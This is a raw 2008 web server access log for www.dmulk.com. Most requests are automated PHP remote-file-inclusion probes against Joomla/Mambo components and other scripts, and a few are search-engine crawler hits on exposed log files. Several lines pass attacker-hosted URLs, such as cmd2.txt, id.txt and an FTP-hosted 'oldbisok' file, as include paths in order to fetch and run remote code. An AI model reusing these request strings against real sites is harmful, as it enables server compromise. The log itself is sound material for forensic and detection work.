74.53.229.194 - - [27/Mar/2008:06:27:12 -0700] "GET /logs//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.geocities.com/boyo.kali/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [27/Mar/2008:06:27:35 -0700] "GET /logs/access_080313.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.geocities.com/boyo.kali/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [27/Mar/2008:06:27:38 -0700] "GET /logs/access_080223.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.geocities.com/boyo.kali/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [27/Mar/2008:06:27:39 -0700] "GET /logs//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.geocities.com/boyo.kali/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [27/Mar/2008:06:28:01 -0700] "GET /logs/access_080313.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.geocities.com/boyo.kali/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.223 - - [27/Mar/2008:06:28:37 -0700] "GET /logs/access_070930.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.159 - - [27/Mar/2008:06:30:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.159 - - [27/Mar/2008:06:30:33 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:06:31:21 -0700] "GET /logs/access_071230.log/home.php?p=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:06:31:22 -0700] "GET /home.php?p=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:06:31:22 -0700] "GET /logs/home.php?p=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.224 - - [27/Mar/2008:06:32:11 -0700] "GET /index.php?pg=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.216.249.224 - - [27/Mar/2008:06:32:11 -0700] "GET /logs/index.php?pg=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
211.21.48.203 - - [27/Mar/2008:06:32:38 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:33:29 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:33:55 -0700] "GET /logs/access_080312.log//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:06:34:01 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.159 - - [27/Mar/2008:06:34:18 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:06:34:21 -0700] "GET /logs/access_080118.log/home.php?p=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:34:23 -0700] "GET /logs/access_080312.log//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:06:34:37 -0700] "GET /logs/access_080118.log/home.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:06:34:37 -0700] "GET /home.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:06:34:38 -0700] "GET /logs/home.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:06:34:43 -0700] "GET /logs/access_071230.log/home.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.102.153 - - [27/Mar/2008:06:35:03 -0700] "GET /index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.118.102.153 - - [27/Mar/2008:06:35:03 -0700] "GET /logs/index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:06:35:52 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:06:35:53 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:39:08 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:39:10 -0700] "GET /logs/access_080312.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:39:31 -0700] "GET /logs/access_080312.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:39:59 -0700] "GET /logs/access_080225.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:40:03 -0700] "GET /logs/access_080223.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:40:24 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:40:24 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:40:25 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:43:02 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:43:02 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:43:03 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:43:03 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:43:03 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:43:03 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.36.213.36 - - [27/Mar/2008:06:44:46 -0700] "GET /logs/access_080223.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.213.36 - - [27/Mar/2008:06:44:46 -0700] "GET //index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.213.36 - - [27/Mar/2008:06:44:47 -0700] "GET /logs//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:06:45:38 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:06:45:38 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.159 - - [27/Mar/2008:06:45:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.159 - - [27/Mar/2008:06:45:42 -0700] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.221.184.180 - - [27/Mar/2008:06:45:52 -0700] "GET /logs/access_080223.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [27/Mar/2008:06:45:53 -0700] "GET /index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [27/Mar/2008:06:45:53 -0700] "GET /logs/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.213.36 - - [27/Mar/2008:06:46:05 -0700] "GET /logs/access_080313.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.159 - - [27/Mar/2008:06:46:44 -0700] "GET /logs/access_080119.log HTTP/1.0" 200 618239 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:47:24 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.3.45 - - [27/Mar/2008:06:47:26 -0700] "GET /logs/access_080113.log/index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [27/Mar/2008:06:47:27 -0700] "GET /index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [27/Mar/2008:06:47:28 -0700] "GET /logs/index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:48:02 -0700] "GET /logs/access_080223.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:48:03 -0700] "GET /index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:48:03 -0700] "GET /logs/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:06:48:26 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:48:42 -0700] "GET /logs/access_080213.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:48:43 -0700] "GET /logs/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:06:49:41 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:50:00 -0700] "GET /logs/access_080223.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:50:01 -0700] "GET /index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:50:01 -0700] "GET /logs/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:50:24 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.221.184.180 - - [27/Mar/2008:06:50:29 -0700] "GET /logs/access_080225.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.97 - - [27/Mar/2008:06:50:33 -0700] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:06:51:37 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:06:51:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:06:51:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:06:52:10 -0700] "GET /index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:52:46 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:52:46 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:52:46 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:06:53:27 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:06:53:31 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:06:53:39 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:53:40 -0700] "GET /logs/access_080129.log//hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:53:40 -0700] "GET //hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:53:41 -0700] "GET /logs//hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:53:43 -0700] "GET /logs/access_080129.log//hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:53:43 -0700] "GET //hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:53:43 -0700] "GET /logs//hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:53:46 -0700] "GET /logs/access_080223.log//oneadmin/photogallery/include.php?path[docroot]=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:53:47 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:53:47 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:53:48 -0700] "GET /logs/access_080223.log//oneadmin/photogallery/include.php?path[docroot]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:53:49 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:53:49 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.139.98 - - [27/Mar/2008:06:54:01 -0700] "GET /logs/access_080211.log//?mosConfig_absolute_path=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [27/Mar/2008:06:54:01 -0700] "GET //?mosConfig_absolute_path=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:06:54:01 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [27/Mar/2008:06:54:02 -0700] "GET /logs//?mosConfig_absolute_path=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 200 40554 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:55:11 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:55:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:55:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:55:31 -0700] "GET /logs/access_080125.log/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:55:31 -0700] "GET /myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:55:31 -0700] "GET /logs/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:55:42 -0700] "GET /logs/access_080119.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:06:56:04 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:06:56:13 -0700] "GET /logs/access_080225.log//oneadmin/photogallery/include.php?path[docroot]=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
